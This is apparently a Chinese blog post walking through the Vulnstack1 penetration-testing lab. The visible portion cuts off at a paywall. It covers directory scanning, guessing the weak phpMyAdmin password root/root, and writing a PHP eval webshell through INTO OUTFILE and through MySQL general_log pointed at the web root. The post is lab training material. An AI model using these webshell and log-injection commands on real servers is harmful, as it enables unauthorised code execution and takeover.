红日靶场vulnstack1 内网渗透学习

已于 2022-09-18 14:01:53 修改
阅读量2.3k 收藏 18
点赞数 4
CC 4.0 BY-SA版权
分类专栏: 渗透测试 文章标签: 安全 网络安全 web安全
于 2022-09-18 12:36:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/snowlyzz/article/details/126886731
本文详细记录了红日靶场的内网渗透学习过程,包括信息收集、phpmyadmin与yxcms的getshell方法,以及利用MSF进行内网信息收集和永恒之蓝攻击。通过CS派生会话给公网MSF,尝试对内网主机进行横向渗透,但永恒之蓝攻击未成功。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

前言:

信息收集:

phpmyadmin getshell

日志写shell

yxcms getshell

植入后们:

内网域环境信息收集:

基于msf 进行信息收集:

 基于msf 内网信息收集:

内网收集思路总结:

CS派生会话给公网MSF

 CS开启监听:

 3.cs 派生会话。

​编辑

 MSF 利用MSF小记 | 命令 (lmlphp.com):

 MSF进行 永恒之蓝攻击:

 MSF 内网端口扫描。

利用ms17-010

总结:

前言:

仅记录学习过程,期间也会借鉴其他师傅的文章

靶场环境搭建的话,可以参考其他师傅。

我的环境:

kali (攻击机):192.168.92.129

Windows 7 (web服务器):192.168.92.128(外网和kali连通)、192.168.52.143(内网)

Windows 2008 (域控):192.168.52.138

Win2k3 (域管):192.168.52.141

信息收集:

因为web 网页是起来了,如果我们不知道对方的环境,借此,我们可以对这个网站进行扫描。

看到80端口起了HTTP服务, 3306端口起了 mysql

访问一下此 IP 的80 端口。

 

是一个phpinfo() 针探页面 ,以这个网址为根目录,再扫描一下其他路径。工具挺多,得看字典了。我使用的 dirsearch

扫到了 phpinfo.php  还有一个phpmyadmin 后台,这里应该还有一个beifen.rar,字典不够强

 访问phpmyadmin 好像是要我们弱口令登录,如果是公共机的话,一般都会存在弱口令的,这里试下admin admin root root  admin  123456 等弱口令,试出来是root root  如果实在是不行,可以用bp爆破。

拿到 pgpmyadmin 后 ,接下来就要用phpmyadmin 去getshell 。

phpmyadmin getshell

一、 into outfile 和into dumpfile 写马

这两个可以写马,但是有区别的,一个可以写多行,另一个只能写一行,具体不清楚,并且他们使用的时候需要条件,就是配置文件中的 secure_file_prive 这个值是需要要求的。

我们可以查看一下secure_file_prive 值:

show variables like "%secure_file%";

into写入文件:
使用需看要secure_file_priv的值。

当value为“null”时,不允许写入或者读取

当value为“空”时,允许读取任意文件

当value为"/tmp"时,只允许在/tmp目录中写入和读取

value可也已设置为其他路径。

这里 show variables like "secure_file_prive%" 查询的结果为空,就行不通了。

 看到这里的值为NULL 所以是 不允许写入或者读取文件。

ps  如果想要通过into 写入文件:

修改value的值:
windows下修改配置文件:mysql.ini
linux修改配置文件:my.cnf

如果我们可以利用写写文件的命令时,我们需要知道当前目录的情况,这需要一个查询当前目录的指令:

select @@basedir

 知道当前目录情况,直接写马就好了

然后通过执行select ‘<?php eval($_POST[cmd]);?>’ into outfile ‘C:/phpStudy/www/shell.php’;将木马写入到网站的根目录。 

select 1,'<?php eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/html/test.php'#

select 1,'<?php eval($_POST[cmd]);?>' INTO dumpfile '/var/www/html/test.php'#
#区别在于使用outfile时,文件中一行的末尾会自动换行

写入失败。通过查询得知这里不能使用into outfile的方式写入shell。
可以通过执行“show variables like ‘%secure_file%’;”查询下是否能直接写入shell。这里secure_file_priv的值为NULL,说明不能使用into outfile的方式写入shell。
 

日志写shell

应该是用的最多的一个姿势了,因为日志的文件名可控,而且 写入的位置也可控。

查看日志状态:

show variables like ‘%general%’;

 general_log  和general_log_file  的简述:

  • mysql打开general_log 开关后,所有对数据库的操作都将记录在general_log_file指定的文件目录中 以原始的状态来显示,如果将general_log开关打开,general_log_file 指定一个php 文件,则查询的操作 将会全部写入到 general_log_file 指定的文件,可以通过访问 general_log_file 指定的文件来获取 webshell。

上面看到 general_log 的value是off  我们需要手动开启。

set global general_log = "ON";    //开启记录查询操作
set global general_log_file=‘C:/phpStudy/www/1.php’,指定日志写入到网站根目录的 1.php 文件.

 成功修改选项。 指定日志会写入到网站根目录的 1.php文件里。

也就是说,我们执行查询语句,他会把操作的内容写入到1.php 里面,所以我们执行

select '<?php eval($_POST[a]);?>'

访问 1.php 

有报错,说明确实是写进去了。windows10 用蚁剑连一下。

 

成功连接。看到有个beifen,其中是yxcms的源码。

yxcms getshell

最低0.47元/天 解锁文章

200万优质内容无限畅学
内网渗透——红日靶机学习(一)
jammny
11-13 6590
前言 开启内网学习,域渗透之路... 环境搭建 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 内网拓扑: 我选用wmware ESXI进行内网环境搭建,内网搭建如下: WIN7(web服务器):172.26.16.123/192.168.52.143 WIN2008(域控):192.168.52.138 WIN2003(域成员):192.168.52.141 渗透测试 一、外网打点 信息收..
红日内网渗透靶场vulnstack2
snowlyzz的博客
09-20 1319
红日渗透二学习
红日靶场内网渗透(一)
m0_52923241的博客
02-07 4335
适合第一次搭建内网的师傅们——红日靶场内网渗透(一) 文章目录一、环境搭建二、渗透思路2.1 信息收集2.2 漏洞发现漏洞一:弱口令漏洞二:xss漏洞三:任意文件读取漏洞四:phpmyadmin文件写入2.3 漏洞利用2.4 内网渗透三、常见知识点3.1 探针文件3.2 yxcms1.2.1四、常用工具4.1 nmap4.2 蚁剑4.3 cs4.4 msf 一、环境搭建 前言:第一次搭建内网环境,花了两天时间。终于是搞清楚了各种配置,和每个主机之间的关系 靶机下载链接:红日实战靶场,一共三个靶机
手把手教你如何进行内网渗透:从零基础到实战突破(非常详细)从零基础入门到精通,收藏这篇就够了
最新发布
Python_0011的博客
06-24 707
内网安全?早就不是摆设了。谁还跟你玩传统的“进来看看”?现在是刺刀见红的巷战!数据泄露?年年创新高,背后都是内网被捅成了筛子。别扯什么“最新攻防技术”,直接上干货,教你从零开始,把内网搅个底朝天,也让防御方长点记性!
渗透测试之Vulnstack1内网域渗透
LvHLong的博客
04-27 3435
使用dirsearch扫描目录 python dirsearch.py -u http://192.168.234.177/ -i 200,301 发现备份文件 beifen.rar 和 phpmyadmin 使用 Nmap 扫描
Vulnstack红日安全内网域渗透靶场1实战
热门推荐
道阻且长,行则将至
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
VulnStack靶场(一)
Lyaas的博客
06-02 1222
ATT&CK——VulnStack1红队(一)欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 3329
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
极品靶场,多种玩法【实战】红日靶场七:内网综合渗透
Eason_LYC安全白帽子的成长博客
10-19 1251
收集十多篇该靶场文章,结合自己通关笔记,形成的一份集大成靶场wp
红日靶场渗透测试——红日靶场1(详细笔记)
qq_52849046的博客
05-24 1万+
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅学习使用,切勿用于实战,容易被gangan
内网域渗透总结(红日靶场一)
未完成的歌~的博客
04-11 1万+
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
ATT&CK靶机实战系列之vulnstack1
hanjinming110的博客
07-08 879
一篇关于红日靶机渗透的文章,主要是想跟各位师傅一起学习一下!
内网渗透实践——红日靶场
qq_42739469的博客
11-05 429
这一台web服务器具有外部的公网IP地址(192.168.5.134)也具有整个域内部的内网ip,那么我们首先的思路就是拿下这一台web服务器作为我们入侵整个内网的跳板。直到成功创建会话,然后我们使用getuid来查看我们登陆的用户名称以及用户组,发现权限不够需要提权,于是我们使用getsystem进行提权。需要注意的是,在这样的设置中我们的监听主机应该设置跳板机的ip。在清晰了入侵目标以后,我们需要做的就是让kali上的更多工具能够访问到内网,我们才能更快更高效的拿下DC。
内网渗透——红日靶场
2401_88083440的博客
05-23 1389
靶场还是学了很多知识,对于内网也更加得心应手了些,回忆一下整篇打靶的路径:首先是通过Tomcat文件上传,成功获得了docker的shell然后利用docker的权限配置问题,进行了docker逃逸进行了ssh爆破,获得了更加稳定的shell使用frp搭建了代理隧道,期间也解决了一些问题,成功用永恒之蓝打下WIN7加载mimikatz抓取win7账号密码,sid。发现是system权限直接修改本机管理员的密码,打开3389端口登录本机管理员。
红日安全ATT&CK靶机实战系列之vulnstack1
黑白的博客
04-13 8796
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 边下载着,可以开始vmware的网络配置 下图为官方给出的,从虚拟机网络来看 攻击者:kali+windows的攻击机 VM1:对外边界服务器,win7 VM2:域成员,2003 VM3:域控,2008 所以这中间出现两个网段,一个外网网段,一个内网网段 鉴于需要两个网段,我们需要在vmware上做一些配置 首先,用一
红日安全红队靶场(三)一次简单的内网渗透
白帽技术与网络安全
07-24 7198
1靶场介绍及设置这是红日团队的第三套靶场靶场下载地址见文末),本次靶场渗透涉及敏感信息泄露、暴力破解、脏牛提权、内网穿透、端口转发、以及域渗透等多种知识点。该靶场环境由5台机器组成,其...
vulnstack系列靶场
aming小老弟
06-09 4214
靶场
vulnstack 1
aliexiansheng的博客
12-15 511
靶机搭建 靶机的下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/#desc 下载好后需要在VM中,先配置好两块网卡。 靶机介绍 web服务器 --------》 windows7 域成员主机 --------》 win2k3 域控主机 ---------》 win2008 靶机配置 (本人下载的靶机时间久远,不知道中途有没有动过,192.168.52段的ip是已经固定好的) win7 : eth1 192.168.77.X eth2
Vulnstack(一)
iO快到碗里来
11-12 1万+
0x00 Preface 网上有很多关于 Vulnstack(一) 的优质文章,本篇文章仅用于记录笔者自身的学习过程。 0x01 环境准备 共有三台机器,Win7是对外的web机,win2003和win2008是内网机器。 VM1(Win7)添加一块网卡,分别设置为:VMnet1(仅主机模式)、VMnet8(NAT模式) VM2(Win2003)网卡设置为:VMnet1(仅主机模式) VM2(Win2008)网卡设置为:VMnet1(仅主机模式) 打开Win2003、Win2008,输入默认
红日靶场VulnStack1
10-08
对于红日靶场VulnStack1,我了解到它是一个虚拟机中的漏洞靶场。这个靶场主要用于学习和实践网络安全方面的知识,其中包含了一些常见的漏洞,供用户进行渗透测试和漏洞攻击的实战练习。 由于我是一个AI模型,并没有...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值